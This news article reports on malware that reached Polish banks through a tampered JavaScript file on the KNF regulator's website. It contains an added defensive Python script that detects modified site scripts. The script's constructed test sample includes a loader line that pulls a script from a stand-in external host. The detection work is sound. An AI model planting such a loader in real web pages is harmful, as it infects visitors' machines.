Banking Malware Attack Spotted in Poland, KNF’s Entire System Down

by Aziz Abdel-Qader
  • Experts believe that the issue can be traced back to the web server of the Polish regulator.
Finance Magnates

Prosecutors and other state security officials in Poland are investigating a hack, unprecedented in size, after discovering that workstations of some banks were hosting malicious software that infected various banking systems, according to Polish media.

The news comes a few days after the Polish Financial Supervision Authority (KNF) took down its entire system in a cyber-attack believed to be “from another country” and the first ever to result in a service outage, according to a KNF spokesman.

Experts believe the issue traces back to the web server hosting the Polish regulator’s website, where a modified JavaScript file caused visitors’ browsers to load an external JS file, which then executed malicious payloads on selected targets.
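The tampering described above, a site-hosted JavaScript file changed so that it pulls in a script from another host, is something a site operator can watch for. The following is an added example, not code from the article or from KNF: it compares served JS files against hashes recorded at deploy time and lists script hosts that are not on an allowlist. All host names, paths and file contents are constructed.

```python
import hashlib
import re

# Assumed allowlist: hosts this site legitimately loads scripts from.
ALLOWED_HOSTS = {"www.regulator.example", "cdn.regulator.example"}
# Host part of an absolute or protocol-relative URL that starts a JS string.
URL_HOST = re.compile(r"""["'`](?:https?:)?//([a-z0-9.-]+)""", re.I)

def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()

def external_hosts(js_source):
    """Return hosts named in URL literals that are not on the allowlist."""
    hosts = {m.group(1).lower().rstrip(".") for m in URL_HOST.finditer(js_source)}
    return hosts - ALLOWED_HOSTS

def audit(baseline, current):
    """Compare served JS with deploy-time hashes and report any drift."""
    findings = []
    for path, data in sorted(current.items()):
        expected = baseline.get(path)
        if expected == sha256_hex(data):
            continue  # byte-identical to what was deployed
        findings.append({
            "path": path,
            "status": "unexpected" if expected is None else "modified",
            "unlisted_hosts": sorted(external_hosts(data.decode("utf-8", "replace"))),
        })
    for path in sorted(set(baseline) - set(current)):
        findings.append({"path": path, "status": "missing", "unlisted_hosts": []})
    return findings

# Constructed sample: one file gained a loader for a script on another host.
ORIGINAL = b"function initMenu(){document.body.className='ready';}\n"
TAMPERED = ORIGINAL + (b"var s=document.createElement('script');"
    b"s.src='//static.unknown-host.example/a.js';document.head.appendChild(s);\n")
BASELINE = {"/js/menu.js": sha256_hex(ORIGINAL),
            "/js/site.js": sha256_hex(b"var a=1;\n")}
CURRENT = {"/js/menu.js": TAMPERED, "/js/site.js": b"var a=1;\n"}

if __name__ == "__main__":
    for finding in audit(BASELINE, CURRENT):
        print(finding)
```

The hash mismatch is the primary signal; the host list only helps triage, since a URL assembled at runtime or obfuscated will not appear as a plain string literal.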

According to local media, some financial institutions had seen unusual network traffic and found encrypted executables on several servers. The details were rapidly shared among the group of roughly 20 commercial banks in the country, and other banks started reporting the same issues.

The Polish authorities confirmed that customer money was untouched and that no operations have been affected so far. However, they said that the whole situation is still under investigation, so things may change in the days to come as more information comes to light.

A little more than a year ago, a government department that deals with cybersecurity confirmed that a few Polish commercial banks had been victims of a malware infection. The source of the executables, however, was the one entity they didn’t expect it from – the KNF.

At the time, the investigation suggested that the starting point for the infection could be the server of the Polish financial regulatory body. Overall, it is ironic that the website of the key institution responsible for assuring security in the financial sector was used to attack it.
